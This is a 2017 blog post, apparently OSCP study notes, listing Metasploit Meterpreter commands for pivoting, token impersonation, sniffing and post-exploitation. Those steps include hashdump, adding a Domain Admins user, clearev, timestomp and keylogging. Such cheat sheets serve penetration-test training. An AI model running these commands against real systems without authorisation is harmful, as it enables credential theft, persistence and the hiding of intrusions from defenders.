Monday, September 4, 2017

OSCP - Meterpreter

Basic Commands

sysinfo
getpid
getuid
ps  
ps -S notepad.exe 
kill <pid>
ipconfig
route
migrate <PID>
getsystem
getprivs
use priv
hashdump
shell
background

File System Commands

ls
pwd
cd
del <file>
cat <file>
edit <file>
upload <src_file> <dst_file>
download <src_file> <dst_file>
getwd
getlwd

Port Forwarding

We have compromised victim1 with meterpreter session_id. Background meterpreter and add the route below. It will redirect all traffic for the above victim2_subnet through victim1. 
route add <victim2 subnet> <netmask> <session_id> 
route -h
route list
route delete <victim2_subnet> <netmask> <session+id>
Forwards traffic from port l on Kali(localhost) to port p of Target2 through the compromised Target1 
portfwd
portfwd add -l 1111 -p 2222 -r Target2
portfwd remove -l 1111 -p 2222 -r Target2

Execute Processes

Execute cmd.exe and interact with it 
execute -f cmd.exe -i
Execute cmd.exe with all available tokens 
execute -f cmd.exe -i -t
Execute cmd.exe with all available tokens and make it a hidden process 
execute -f cmd.exe -i -H -t
  1. H Create the process hidden from view
  2. a Arguments to pass to the command
  3. i Interact with the process after creating it
  4. m Execute from memory
  5. t Execute process with currently impersonated thread token
Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory 
run <scriptname>

Registry

Interact, create, delete, query, set, and much more in the target’s registry 
reg <Command> [OPTIONS]
commands: 
enumkey ->Enumerate the supplied registry key
createkey / deletekey   ->  Creates/deletes the supplied registry key
setval / queryval       ->  Set/query values from the supplied registry key
Options:
   -d  ->  Data to store in the registry value
   -k  ->  The registry key
   -v  ->  The registry value name

Tokens

use incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
rev2self

Sniffing

use sniffer
sniffer_interfaces
sniffer_dump interfaceID pcapname
sniffer_start interfaceID packet-buffer
sniffer_stats interfaceID
sniffer_stop interfaceID

Post Exploitation

add_user username password -h ip
add_group_user “Domain Admins” username -h ip
clearav
timestomp
screenshot
keyscan_start
keyscan_dump
keyscan_stop
uictl enable keyboard/mouse
setdesktop number
reboot
run post/windows/manager/enable_rdp
+ Run msfmap 
Download it from http://code.google.com/p/msfmap
load msfmap
msfmap

References

https://pentestlab.blog/2012/03/26/meterpreter-commands/
https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

0 comments:

Post a Comment

About Us